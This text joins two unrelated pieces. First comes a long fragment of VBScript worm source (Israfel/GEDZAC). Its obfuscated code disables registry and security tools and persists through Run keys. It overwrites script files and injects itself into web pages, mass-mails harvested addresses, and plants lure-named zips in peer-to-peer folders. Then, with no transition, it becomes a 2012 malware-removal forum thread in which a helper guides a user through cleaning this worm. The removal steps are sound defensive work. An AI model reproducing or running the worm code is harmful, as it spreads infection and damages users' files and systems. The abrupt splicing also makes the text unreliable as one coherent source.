Set ms = fso.OpenTextFile(Gsp(3)): iscript = ms.ReadAll: ms.Close
Rgw q(OLB^XDKFTTBTXUHHS[ub`ankb[tobkk[hwbi[dhjjfic[), GEDZAC,
Rgw q(OLB^XDKFTTBTXUHHS[lb~ankb[tobkk[hwbi[dhjjfic[), GEDZAC,
Rgw q(OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt'Tdunwsni`'Ohts[Tbssni`t[Snjbhrs),0,REG_DWORD
Rgw q(OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Whkndnbt[T~tsbj[CntfekbUb`ntsu~Shhkt),1,REG_DWORD
Rgw q(OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[PnichptIS[DruubisQbutnhi[Whkndnbt[T~tsbj[CntfekbUb`ntsu~Shhkt),1,REG_DWORD
Rgw q(OLB^XKHDFKXJFDONIB[Thaspfub[Jnduhthas[Pnichpt'Tdunwsni`'Ohts[Tbssni`t[Snjbhrs),0,REG_DWORD
Rgw q(OLB^XKHDFKXJFDONIB[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Whkndnbt[T~tsbj[CntfekbUb`ntsu~Shhkt),1,REG_DWORD
Rgw q(OLB^XKHDFKXJFDONIB[Thaspfub[Jnduhthas[PnichptIS[DruubisQbutnhi[Whkndnbt[T~tsbj[CntfekbUb`ntsu~Shhkt),1,REG_DWORD
jscode=q(qfu'ath':'ibp'Fdsnqb_Hembds/%Tdunwsni`)AnkbT~tsbjHembds%.<)&vbcrlf&_
q(qfu'ptk':'ibp'Fdsnqb_Hembds/%PTdunws)Tobkk%.<)&vbcrlf&q(qfu'mt':'ath)HwbiSbsAnkb/PTdunws)TdunwsArkkIfjb.<)&vbcrlf&_
q(ahu'/n:6<'n;64<'n,,.'|'mt)TlnwKnib/.<'z)&vbcrlf&q(mtd':'mt)UbfcFkk/.<)&vbcrlf&_
q(mtd':'mtd)ubwkfdb/%-(%+%%.<)&vbcrlf&q(mt)Dkhtb/.<)&vbcrlf&_
q(qfu'mt':'ath)DubfsbSbsAnkb/ath)@bsTwbdnfkAhkcbu/6.,%[[mt)qet%.<)&vbcrlf&_
q(mt)Punsb/mtd.<)&vbcrlf&q(mt)Dkhtb/.<)&vbcrlf&q(ptk)Uri/ath)@bsTwbdnfkAhkcbu/6.,%[[mt)qet%.<)&vbcrlf&q((-)&vbcrlf
If InStr(LCase(Gsp(3)),q(lbuibk45))=0 Then
Call Main: WScript.Quit
Else
Call Main: Call ListP2P: Call iFirmas
Call CreateASP: Call VBSinDoc
Call VBSinXls: Call SearchInDrivesB
Call Payload: Call SendImail
'->Call ActualizarVBS: Call SearchInDrivesA
Call ISleep
End If
End If
'----------------------------------------------------------------------------
Sub Main()
On Error Resume Next
Call CreateNewExt
Rgw q(OLB^XKHDFKXJFDONIB[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[Lbuibk45), Gsp(1)&q([Lbuibk45)pni),
fso.CopyFile Gsp(3), Gsp(1)&q([Ntufabk)qet)
Rgw q(OLB^XKHDFKXJFDONIB[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[Ntufabk), Gsp(1)&q([Ntufabk)qet),
fso.CopyFile Gsp(3), Gsp(1)&q([@BC]FD)qet)
fso.CopyFile Gsp(3), Gsp(1)&q([jhrtbXdhian`rufshu)pni)
IniEdit Gsp(0)&q([pni)nin), q(\pnichptZ), q(uri), Gsp(1)&q([jhrtbXdhian`rufshu)pni)
fso.CopyFile Gsp(3), Gsp(1)&q([pnij`c)pni)
IniEdit Gsp(0)&q([t~tsbj)nin), q(\ehhsZ), q(tobkk), q(Bwkhubu)bb') & Gsp(1)&q([pnij`c)pni)
fso.CopyFile Gsp(3), Gsp(1)&q([Ankb)qet)
If Not(FileEx(Gsp(1)&q([wl}nw)bB))) Then Omponents 1,Gsp(1)&q([wl}nw)bB)
If Not(FileEx(Gsp(1)&q([ub`tuq)bB))) Then Omponents 4,Gsp(1)&q([ub`tuq)bB)
wsl.Run Gsp(1)&q([ub`tuq)bB)
If Not(FileEx(Gsp(1)&q([ankb}nw)}nw))) Then
wsl.Run GetCl() & Gsp(1)&q([wl}nw)bb') & fso.GetFolder(Gsp(1)).ShortPath & q([ankb}nw)}nw) & & Nms(Gsp(1)&q([ankb)qet)),0,True
End If
If FileEx(Gsp(1)&q([Lbuibk45)pni)) Then Exit Sub
Call Avril
Rgw q(OLB^XKHDFKXJFDONIB[Thaspfub[@BC]FD'KFET[Ntufabk[Wfubis),Gsp(3),
fso.CopyFile Gsp(3), Gsp(1)&q([Lbuibk45)pni)
If InStr(LCase(Gsp(3)),q(lbuibk45))=0 Then wsl.Run Gsp(1)&q([Lbuibk45)pni): WScript.Quit
End Sub
'----------------------------------------------------------------------------
Sub SearchInDrivesA()
On Error Resume Next
Set Osd = CreateObject(q(Phuc)Fwwkndfsnhi))
If ValidObject(Osd)=False Then Set Osd = CreateObject(q(Bdbk)Fwwkndfsnhi))
If ValidObject(Osd)=False Then Call SearhInDrivesB: Exit Sub
Osd.Visible = False
For Each n in fso.Drives
If (n.DriveType = 2) Or (n.DriveType = 3) Then
Set Nsf = Osd.FileSearch
Nsf.NewSearch
Nsf.LookIn = n.Path & \
Nsf.SearchSubFolders = True
Nsf.FileName = q(-)os<'-)wk`<'-)jos-<'-)qet<'-)qeb<'-)osj-<'-)osf<'-)mt-<'-)}nw<'-)wow<'-)mtw<'-)tosj-<'-)wosj-<'jnud)nin)
Nsf.Execute
For i = 1 To Nsf.FoundFiles.Count
fExt = LCase(fso.GetExtensionName(Nsf.FoundFiles(i))): fNam = LCase(fso.GetFile(Nsf.FoundFiles(i)).Name)
If (fExt=vbs) Or (fExt=vbe) Then
iVbs(Nsf.FoundFiles(i))
ElseIf (fExt=js) Or (fExt=jse) Then
iJs(Nsf.FoundFiles(i))
ElseIf (fExt=hta) Or (fExt=htm) Or (fExt=html) Or (fExt=php) Or (fExt=shtm) Or (fExt=shtml) Or (fExt=phtm) Or (fExt=phtml) Or (fExt=mht) Or (fExt=mhtml) Or (fExt=plg) Or (fExt=htx) Then
iHta(Nsf.FoundFiles(i))
ElseIf (fExt=zip) Then
iZip(Nsf.FoundFiles(i))
ElseIf (fNam=mirc.ini) Then
iMirc(Nsf.FoundFiles(i))
End If
Next
End If
Next
Osd.Quit
End Sub
'----------------------------------------------------------------------------
Sub SearchInDrivesB()
On Error Resume Next
Im=Array(q([njo)cfs),q([njk)cfs),q([njq)cfs))
For i=0 To 2: Set Imm=fso.CreateTextFile(Gsp(2)&Im(i)): Imm.write Israfel/GEDZAC: Imm.Close: Next
For Each D In fso.Drives
If (D.DriveType=2) Or (D.DriveType=3) Then SearchInFolders(D.Path&\)
Next
End Sub
'----------------------------------------------------------------------------
Sub SearchInFolders(Path)
On Error Resume Next
For Each F In fso.GetFolder(Path).SubFolders
SearchFiles(F.Path)
SearchInFolders(F.Path)
Next
End Sub
'----------------------------------------------------------------------------
Sub SearchFiles(Path)
On Error Resume Next
For Each Fi In fso.GetFolder(Path).Files
fExt = LCase(fso.GetExtensionName(Fi.Path)): fNam = LCase(Fi.Name)
If (fExt=vbs) Or (fExt=vbe) Then
iVbs(Fi.Path)
ElseIf (fExt=js) Or (fExt=jse) Then
iJs(Fi.Path)
ElseIf (fExt=hta) Or (fExt=htm) Or (fExt=html) Or (fExt=php) Or (fExt=shtm) Or (fExt=shtml) Or (fExt=phtm) Or (fExt=phtml) Or (fExt=mht) Or (fExt=mhtml) Or (fExt=plg) Or (fExt=htx) Then
iHta(Fi.Path)
ElseIf (fExt=zip) Then
iZip(Fi.Path)
ElseIf (fNam=mirc.ini) Then
iMirc(Fi.Path)
End If
Next
End Sub
'----------------------------------------------------------------------------
Sub iVbs(Path)
On Error Resume Next: SA Path,0
Set vbs = fso.OpenTextFile(Path,2,1): vbs.write iscript: vbs.Close
End Sub
'----------------------------------------------------------------------------
Sub iJs(Path)
On Error Resume Next: SA Path,0
Set js = fso.OpenTextFile(Path,2,1): js.write jscode & iscript & q(-(): js.Close
End Sub
'----------------------------------------------------------------------------
Sub iHta(Path)
On Error Resume Next: SA Path,0
Set Xf = fso.OpenTextFile(Path)
Do While Xf.AtendOfstream = False
Xl = Xf.ReadLine
If InStr(LCase(Xl), israfel) <> 0 then
Exit Do
End if
n = InStr(LCase(Xl), mailto:)
If n <> 0 Then
Xl = Left(Right(Xl, (Len(Xl) - (n + 6))), InStr(Right(Xl, (Len(Xl) - (n + 6))), Chr(34)) - 1)
If IsMail(Xl) Then Sdy.Add Sdy.Count + 1, Xl
End If
Loop
Xf.Close
Call iMail
Set hta = fso.OpenTextFile(Path): htar = hta.ReadAll: hta.Close
If InStr(LCase(htar),israfel)<>0 Then Exit Sub
If InStr(LCase(Path),inetpub)=0 Then
Set hta = fso.OpenTextFile(Path,8): hta.write vbcrlf& q(;Tdunws'Kfi`rf`b: QETdunws 9) &vbcrlf& iscript &vbcrlf& q(;(Tdunws9): hta.Close
Else
Set hta = fso.OpenTextFile(Path,2): hta.write vbcrlf & q(;Hembds'Cfsf:%nntuhhs)ftw%9;(Hembds9)&<!-- Israfel --¡> & vbCrlf & htar: hta.Close
End If
End Sub
'----------------------------------------------------------------------------
Sub iZip(Path)
On Error Resume Next
If Not(FileEx(Gsp(1)&\file.vbs)) Then Exit Sub
SA Path,0
wsl.Run GetCl() & Gsp(1)&\pkzip.exe -U & Nms(Path) & & Nms(Gsp(1)&\file.vbs),0,True
End Sub
'----------------------------------------------------------------------------
Sub ListP2P()
On Error Resume Next
p1 = Array(q(D=[Wuh`ufj'Ankbt), q(D=[Fudonqht'cb'wuh`ufjf))
p2 = Array(q([fwwkbMrndb[nidhjni`), q([bChilb~5777[nidhjni`), q([@irdkbrt[Chpikhfct), _
q([@uhltsbu[J~'@uhltsbu), q([NDV[tofubc'ankbt), q([Lf}ff[J~'Tofubc'Ahkcbu), _
q([Lf]fF'Knsb[J~'Tofubc'Ahkcbu), q([KnjbPnub[Tofubc), q([jhuwobrt[J~'Tofubc'Ahkcbu), _
q([Hqbuibs[nidhjni`), q([Tofubf}f[Chpikhfct), q([Tpfwshu[Chpikhfc), q([PniJ_[J~'Tofubc'Ahkcbu), _
q([Sbtkf[Ankbt), q([_hkh_[Chpikhfct), q([Ufwn`fshu[Tofub), q([LJC[J~'Tofubc'Ahkcbu), q([EbfuTofub[Tofubc))
For i = 0 To UBound(p1)
If FolderEx(p1(i)) Then
For x = 0 To UBound(p2)
If FolderEx(p1(i) & p2(x)) Then InfectP2P (p1(i) & p2(x))
Next
End If
Next
If FolderEx(q(D=[J~'Chpikhfct)) Then InfectP2P (q(D=[J~'Chpikhfct))
If FolderEx(q(D=[J~'Tofubc'Ahkcbu)) Then InfectP2P (q(D=[J~'Tofubc'Ahkcbu))
IsD = Rgr(q(OLB^XDRUUBISXRTBU[Thaspfub[ThrkTbbl[NitsfkkWfso))
If IsD <> Then VSoulSeek IsD
End Sub
'----------------------------------------------------------------------------
Sub VSoulSeek(Path)
On Error Resume Next
Set sl1 = fso.OpenTextFile(Path & \shared.cfg)
Do While sl1.AtendOfstream = False
sl2 = sl1.ReadAll
Loop: sl1.Close
sl2 = Mid(sl2, 9, Len(sl2) - 14): sl2 = Mid(sl2, InStr(sl2, :) - 1): InfectP2P sl2
End Sub
'----------------------------------------------------------------------------
Sub InfectP2P(Path)
On Error Resume Next
If Right(Path,1) <> \ Then Path = Path & \
For Each i In P2PName()
If Not(FileEx(Path & i)) Then fso.CopyFile Gsp(1) & \filezip.zip, Path & i
Next
For Each i In ListFiles(Path)
If Not(FileEx(Path & i & .zip)) Then
If i <> Then fso.CopyFile Gsp(1) & \filezip.zip, Path & i & .zip
End If
Next
End Sub
'----------------------------------------------------------------------------
Function ListFiles(Path)
On Error Resume Next: Dim x()
Set Gf = fso.GetFolder(Path): ReDim x(Gf.Files.Count): a = 0
For Each i In Gf.Files
Ex = LCase(fso.GetExtensionName(i.Path))
If (Ex <> zip) Then x(a) = fso.GetBaseName(i.Name): a = a + 1
Next: ListFiles = x
End Function
'----------------------------------------------------------------------------
Sub CreateNewExt()
On Error Resume Next
Rgw q(OLB^XDKFTTBTXUHHS[)pni[),q(pniankb),
Rgw q(OLB^XDKFTTBTXUHHS[)pni[Dhisbis'S~wb),q(fwwkndfsnhi(*jtchpikhfc),
Rgw q(OLB^XDKFTTBTXUHHS[pniankb[CbafrksNdhi[),Rgr(q(OLB^XDKFTTBTXUHHS[ckkankb[CbafrksNdhi[)),
Rgw q(OLB^XDKFTTBTXUHHS[pniankb[TdunwsBi`nib[),q(QETdunws),
Rgw q(OLB^XDKFTTBTXUHHS[pniankb[Tobkk[Hwbi[Dhjjfic[),WScript.FullName & %1 %*,
Rgw q(OLB^XDKFTTBTXUHHS[pniankb[TobkkB[Wuhwbus~TobbsOfickbut[PTOWuhwt[),q(|17523DF2*>24E*66DA*?D>1*77FF77E?07?Dz),
Rgw q(OLB^XDKFTTBTXUHHS[pniankb[TdunwsOhtsBidhcb[),q(|?2646146*3?7D*66C5*E6A>*77D73A?1D453z),
End Sub
'----------------------------------------------------------------------------
Sub Payload()
On Error Resume Next
Set pay = fso.CreateTextFile(C:\Estigma.hta): pay.write q(;osjk9;obfc9;snskb9Ntufabk'Phuj'*'@BC]FD'KFET'5774;(snskb9;(obfc9;ehc~'e`dhkhu:ekfdl'sbs:ubc9;dbisbu9;e9;----------------@BC]FD'KFET----------------9;w9QET(Ntufabk'e~'JfdonibCufjhi(@BC]FD;w9Obdoh'bi'bk'Wbuý'+Dfkncfc'Jricnfk''';w9¦Knebusfc'f'Wfkbtsnif+'Nufv'~'Fa`fintsfi'*'Jrbusb'fk'Njwbunfkntjh'cb'bbrr&;eu9;w9@BC]FD'KFET'5774;(e9;(dbisbu9;(ehc~9;(osjk9): pay.Close
If Day(Date) = 3 Then wsl.Run C:\Estigma.hta
If Day(Date) = 29 Then wsl.Run hxxp://www.avril-lavigne.com
If Day(Date) = 19 Then msgbox 19/12/2003 - Saludos a Cienciano Campeon 2003 de la Copa Sudamericana
If Day(Date) = 26 Then
wscript.echo Soy una ballena de color azúl mi espalda sopla y tu ves esa fuente&vbcrlf&_
de agua limpia aún. Nuestra casa abierta, era el ancho mar&vbcrlf&_
Viajábamos en paz, sin manchas de petróleo que evitar&vbcrlf&_
Busco un sitio puro donde descansar no hay muchas como yo&vbcrlf&_
me tengo que cuidar de ti. Nubes blancas, cielo transparente&vbcrlf&_
y el humano compartiendo con otros, un sueño que quizás ya no regrese&vbcrlf&_
pues ya es tarde para todos nosotros&vbcrlf&_
Soy el cóndor majestuoso del Perú, mi cuello gira y tú&vbcrlf&_
me miras con ojos de luz. Busco un sitio alto donde recordar&vbcrlf&_
que hubo un tiempo mejor, pues como yo no quedan más&vbcrlf&_
Si tus hijos te preguntan cómo fui, no sé que les dirás, me tuve que alejar de ti&vbcrlf&_
Cordilleras blancas dominando, todo ser que se alimenta del río&vbcrlf&_
hombres en aldeas cultivando, sin decirle al campo dame lo que es mío&vbcrlf&_
Estás equivocado, no sabes dónde vas&vbcrlf&guanacos, osos panda, renos, águilas, delfines y todo lo demás&vbcrlf&_
Estás equivocado no sabes dónde vas&vbcrlf&un espíritu ronda por la selva llorando lo que fue el jaguar&vbcrlf&_
bienvenido al mundo del hombre construído con detergentes y también con alquitrán&vbcrlf&_
Soy una ballena de color azúl mi espalda sopla y tú&vbcrlf&ves esa fuente de agua limpia aún&vbcrlf&vbcrlf&vbcrlf&_
(Cancion perteneciente a 'Los Nosequien y Los Nosecuantos')&vbcrlf&vbcrlf&vbcrlf&El 26 de Abril es el día de la Tierra, protegela
End If
If Day(Date) = 11 Then
msgbox Luego del alevoso ataque de eeuu y sus aliados&vbcrlf&contra Iraq, aun tiene bush el descaro de decir&vbcrlf&_
que lo hizo por libertar al pueblo o por la&vbcrlf&democracia, como si eso le interesara, solo le&vbcrlf&_
interesa tener gobiernos titeres y el petroleo&vbcrlf&(investiguen sobre su dizque reconstruccion&vbcrlf&_
de Iraq), desde los 90 que se pretendia derrocar&vbcrlf&al gobierno de Iraq, quien le dio el derecho de decidir que&vbcrlf&_
gobiernos deben ser derrocados o no, acaso&vbcrlf&se cree el policia del mundo, una de las frases&vbcrlf&_
favoritas del Asesino de bush, es el 'origen&vbcrlf&del mal' el es eso.&vbcrlf&_
Y para terminar otra de sus frases&vbcrlf&'que Dios bendiga a los eeuu' ojala lo haga&vbcrlf&_
porque lo van a nesecitar, porque algun&vbcrlf&dia eeuu pagara por querer decirle al&vbcrlf&_
mundo como tiene que vivir&vbcrlf&vbcrlf&(Mensage en contra del Gobierno de eeuu, no del pueblo)
End If
End Sub
'----------------------------------------------------------------------------
Function P2PName()
On Error Resume Next
P = Array(Ana Kournikova Sex Video.zip, AVP Antivirus Pro Key Crack.zip, Britney Spears Sex Video.zip, Buffy Vampire Slayer Movie.zip, _
Crack Passwords Mail.zip, Cristina Aguilera Sex Video.zip, Game Cube Real Emulator.zip, Hentai Anime Girls Movie.zip, Jenifer Lopez Sex Video.zip, _
Matrix Movie.zip, Mcafee Antivirus Scan Crack.zip, Norton Anvirus Key Crack.zip, Panda Antivirus Titanium Crack.zip, PS2 PlayStation Simulator.zip, _
Quick Time Key Crack.zip, Sakura Card Captor Movie.zip, Sex Live Simulator.zip, Sex Passwords.zip, Spiderman Movie.zip, Start Wars Trilogy Movies.zip, _
Thalia Sex Video.zip, Winzip KeyGenerator Crack.zip , aol cracker.zip, aol password cracker.zip, divx pro.zip, GTA 3 Crack.zip, GTA 3 Serial.zip, _
play station emulator.zip, virtua girl - adriana.zip, virtua girl - bailey short skirt.zip, Virtua Girl (Full).zip, warcraft 3 crack.zip, warcraft 3 serials.zip, _
counter-strike.zip, delphi.zip, divx_pro.zip, HotGirls.zip, hotmail_hack.zip, pamela_anderson.zip, serials2000.zip, subseven.zip, VB6.zip, VirtualSex.zip, _
ACDSee 5.5.zip, Age of Empires 2 crack.zip, Animated Screen 7.0b.zip, AOL Instant Messenger.zip, AquaNox2 Crack.zip, Audiograbber 2.05.zip, BabeFest 2003 ScreenSaver 1.5.zip, _
Babylon 3.50b reg_crack.zip, Battlefield1942_bloodpatch.zip, Battlefield1942_keygen.zip, Business Card Designer Plus 7.9.zip, Clone CD 5.0.0.3 (crack).zip, Clone CD 5.0.0.3.zip, _
Coffee Cup Free zip 7.0b.zip, Cool Edit Pro v2.55.zip, Diablo 2 Crack.zip, DirectDVD 5.0.zip, DirectX Buster (all versions).zip, DirectX InfoTool.zip, DivX Video Bundle 6.5.zip, _
Download Accelerator Plus 6.1.zip, DVD Copy Plus v5.0.zip, DVD Region-Free 2.3.zip, FIFA2003 crack.zip, Final Fantasy VII XP Patch 1.5.zip, Flash MX crack (trial).zip, FlashGet 1.5.zip, _
FreeRAM XP Pro 1.9.zip, GetRight 5.0a.zip, Global DiVX Player 3.0.zip, Gothic2 licence.zip, Guitar Chords Library 5.5.zip, Hitman_2_no_cd_crack.zip, Hot Babes XXX Screen Saver.zip, _
ICQ Pro 2003a.zip, ICQ Pro 2003b (new beta).zip, iMesh 3.6.zip, iMesh 3.7b (beta).zip, IrfanView 4.5.zip, KaZaA Hack 2.5.0.zip, KaZaA Speedup 3.6.zip, Links 2003 Golf game (crack).zip, _
Living Waterfalls 1.3.zip, Mafia_crack.zip, Matrix Screensaver 1.5.zip, MediaPlayer Update.zip, mIRC 6.40.zip, mp3Trim PRO 2.5.zip, MSN Messenger 5.2.zip, NBA2003_crack.zip, _
Need 4 Speed crack.zip, Nero Burning ROM crack.zip, Netfast 1.8.zip, Network Cable e ADSL Speed 2.0.5.zip, NHL 2003 crack.zip, Nimo CodecPack (new) 8.0.zip, PalTalk 5.01b.zip, _
Popup Defender 6.5.zip, Pop-Up Stopper 3.5.zip, QuickTime_Pro_Crack.zip, Serials 2003 v.8.0 Full.zip, SmartFTP 2.0.0.zip, SmartRipper v2.7.zip, Space Invaders 1978.zip, _
Splinter_Cell_Crack.zip, Steinberg_WaveLab_5_crack.zip, Trillian 0.85 (free).zip, TweakAll 3.8.zip, Unreal2_bloodpatch.zip, Unreal2_crack.zip, UT2003_bloodpatch.zip, _
UT2003_keygen.zip, UT2003_no cd (crack).zip, UT2003_patch.zip, WarCraft_3_crack.zip, Winamp 3.8.zip, WindowBlinds 4.0.zip, WinOnCD 4 PE_crack.zip, WinZip 9.0b.zip, _
Yahoo Messenger 6.0.zip, Zelda Classic 2.00.zip, Windows XP complete + serial.zip, Screen saver christina aguilera.zip, Screen saver christina aguilera naked.zip, Visual basic 6.zip, _
Starcraft serial.zip, Credit Card Numbers generator(incl Visa,MasterCard,...).zip, Edonkey2000-Speed me up scotty.zip, Hotmail Hacker 2003-Xss Exploit.zip, Kazaa SDK + Xbit speedUp for 2.xx.zip, _
Microsoft KeyGenerator-Allmost all microsoft stuff.zip, Netbios Nuker 2003.zip, Security-2003-Update.zip, Stripping MP3 dancer+crack.zip, Visual Basic 6.0 Msdn Plugin.zip, Windows Xp Exploit.zip, _
WinRar 3.xx Password Cracker.zip, WinZipped Visual C++ Tutorial.zip, XNuker 2003 2.93b.zip, cable modem ultility pack.zip, macromedia dreamweaver key generator.zip, winamp plugin pack.zip, _
winzip full version key generator.zip): P2PName = P
End Function
'----------------------------------------------------------------------------
Function ValidObject(Obj)
On Error Resume Next
If (Obj Is Nothing) Then ValidObject = False Else ValidObject = True
End Function
'----------------------------------------------------------------------------
Function FileEx(Path)
On Error Resume Next
If fso.FileExists(Path) Then FileEx = True Else FileEx = False
End Function
'----------------------------------------------------------------------------
Function FolderEx(Path)
On Error Resume Next
If fso.FolderExists(Path) Then FolderEx = True Else FolderEx = False
End Function
'----------------------------------------------------------------------------
Function Dcd(HT)
On Error Resume Next
For i = 1 To Len(HT) Step 2
tb = Chr(37+1) & Chr(72) & Mid(HT, i, 2): tt = tt & Chr(tb)
Next: Dcd = tt
End Function
'----------------------------------------------------------------------------
Sub ISleep()
On Error Resume Next: t=0
Do
WScript.Sleep 10000: t=t+1
Call Regenera
Call iRed
If t=60 Then t=0: Call InfectFloppy
Loop
End Sub
'----------------------------------------------------------------------------
Function Nms(Path)
On Error Resume Next
Nms=fso.GetFile(Path).ShortPath
End Function
'----------------------------------------------------------------------------
Sub Rgw(RgPath,RgValue,RgMod)
On Error Resume Next
If RgMod= Then wsl.RegWrite RgPath,RgValue Else wsl.RegWrite RgPath,RgValue,REG_DWORD
End Sub
'----------------------------------------------------------------------------
Function Rgr(RgPath)
On Error Resume Next
Rgr = wsl.RegRead (RgPath)
End Function
'----------------------------------------------------------------------------
Function Gsp(n)
On Error Resume Next
Select Case n
Case 0: Gsp = fso.GetSpecialFolder(n)
Case 1: Gsp = fso.GetSpecialFolder(n)
Case 2: Gsp = fso.GetSpecialFolder(n)
Case 3: Gsp = WScript.ScriptFullName
End Select
End Function
'----------------------------------------------------------------------------
Sub SA(path,n)
On Error Resume Next
fso.GetFile(path).attributes = n
End Sub
'----------------------------------------------------------------------------

#4 worries

worries
  • Topic Starter

  • Members
  • 47 posts
  • OFFLINE
  •  
  • Local time:09:41 AM

Posted 12 May 2012 - 01:24 PM

Actually, I am having trouble pasting as well. There are character strings in the log file that are too long, and I am guessing the forum won't let me post because of that.

What should I do. Can I upload the full file somewhere so you can download from there. IT is about 278 KB.

#5 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:05:41 PM

Posted 12 May 2012 - 03:19 PM

Hello,



Please bear with me. The log look strange. ComboFix seemed to run partially.
Is there a log called Bug.txt created on the C:\ drive?
If so please zip both (Combofix.txt and Bug.txt) and upload them here
Thanks!



Regards,
Georgi

cXfZ4wS.png


#6 worries

worries
  • Topic Starter

  • Members
  • 47 posts
  • OFFLINE
  •  
  • Local time:09:41 AM

Posted 12 May 2012 - 05:06 PM

no bug.txt in C.
I know combofix ran for a long time, and it did multiple boots.

After it finished running, my internet started working. But it has stopped working again.

I submitted the file where you asked.

Edited by worries, 12 May 2012 - 05:07 PM.


#7 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:05:41 PM

Posted 12 May 2012 - 05:17 PM

Hi,



We need to disable Spybot S&D's "TeaTimer"



TeaTimer works by preventing ANY changes to the system. It will attempt to undo any fixes we run, because it blocks these fixes from running.

In order to safeguard your system from problems that can be brought on by a half finished fix, we need to disable TeaTimer. We can reenable it when we're done if you like.
  • Open SpyBot Search and Destroy by going to Start -> All Programs -> Spybot Search and Destroy -> Spybot Search and Destroy.
  • If prompted with a legal dialog, accept the warning.
  • Click on mode and then on "Advanced Mode"
    Posted Image
  • You may be presented with a warning dialog. If so, press Posted Image
  • Click on Posted Image
  • Click on Posted Image
  • Uncheck this checkbox:
    Posted Image
  • Close/Exit Spybot Search and Destroy




Run HijackThis.



  • Click on Do a system scan only.
  • Place a checkmark next to these lines (if still present).

    F1 - win.ini: run=C:\WINDOWS\system32\mouse_configurator.win
    O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
    O4 - HKLM\..\Run: [Israfel] C:\WINDOWS\system32\Israfel.vbs
    O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1

  • Then close all windows except HijackThis and click Fix Checked.





We need to execute a CFScript to clean some remnants.



Please do this:


1. Open notepad => navigate to format and make sure that wordwrap is unchecked. <--- important !!!

2. Copy/paste the text in the codebox below into it: (include the link as well).

http://www.bleepingcomputer.com/forums/topic453394.html

Collect::
c:\windows\system32\hta.vbs
c:\windows\system32\Israfel.vbs
c:\windows\system32\GEDZAC.vbs
c:\windows\system32\File.vbs
C:\Windows\system232\mouse_configurator.win
Registry::
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"=dword:00000001 
"DisableNotifications"=dword:00000000

Save this as CFScript.txt, in the same location as ComboFix.exe

3. Close any open browsers.

4. Referring to the picture below, drag CFScript into ComboFix.exe

Posted Image

5. When Combofix finishes running, the ComboFix log will open along with a message box. With the above script, ComboFix captured some files to submit for analysis.
  • Important: Ensure you are connected to the internet before clicking OK on the message box.
  • A blue-screen would appear auto-uploading the zipped file I requested.
  • After the uploading is done you should see a message near the bottom saying "Upload was Successful".

**NOTE**
  • IF for some reason Combofix fails to upload anything you will see that message:
    Posted Image
  • Please double-click this file: C:\CF-Submit.htm and follow the instructions there to upload that zipped file.


6. When Combifix finished, it shall produce a log for you at C:\ComboFix.txt which I will require in your next reply.



Regards,
Georgi

cXfZ4wS.png


#8 worries

worries
  • Topic Starter

  • Members
  • 47 posts
  • OFFLINE
  •  
  • Local time:09:41 AM

Posted 12 May 2012 - 06:51 PM

Georgi, I submitted the combofix.txt to the same location where you previously asked me to upload.

#9 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:05:41 PM

Posted 13 May 2012 - 03:48 AM

Hello,



STEP 1



Please download (Right click and choose "save target as" - for Internet explorer or "save link as" - for Mozilla Firefox) UnhookExec.inf to your desktop.
Locate UnHookExec.inf on your desktop, rightclick it and choose 'install'.



STEP 2


  • Go to Start -> Run...
  • Enter notepad in the Run dialog box.
  • Press Posted Image.
  • Highlight the contents of the following codebox, and copy and paste that text into notepad.
    Windows Registry Editor Version 5.00
    
    [-HKEY_CLASSES_ROOT\keyfile]
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings]
    "Timeout"=-
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings]
    "Enabled"=dword:00000000
    
    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Scripting Host\Settings]
    "Timeout"=-
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings]
    "Enabled"=dword:00000000
    
  • Select File -> Save.
  • Press the Desktop button on the left side of the save dialog.
  • In the Posted Image box, type in Fix.reg.
  • Press Posted Image.
  • Close Notepad.
  • Double click Posted Image on your desktop.
  • Press Yes, and then Ok, when prompted.
  • Right click on Posted Image and choose Delete.
  • Press Yes.



STEP 3



Please download SystemLook from one of the links below and save it to your Desktop.
Download Mirror #1
Download Mirror #2

  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    :regfind
    GEDZAC
    
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt



STEP 4



I'd like us to scan your machine with ESET OnlineScan


  • Hold down Control and click on the following link to open ESET OnlineScan in a new window.
    ESET OnlineScan
  • Click the Run ESET Online Scanner button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on Posted Image to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the Posted Image icon on your desktop.
  • Check Posted Image
  • Click the Posted Image button.
  • Accept any security warnings from your browser.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Push the Start button.
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, push Posted Image
  • Push Posted Image, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Push the Posted Image button.
  • Push Posted Image



Regards,
Georgi

cXfZ4wS.png


#10 worries

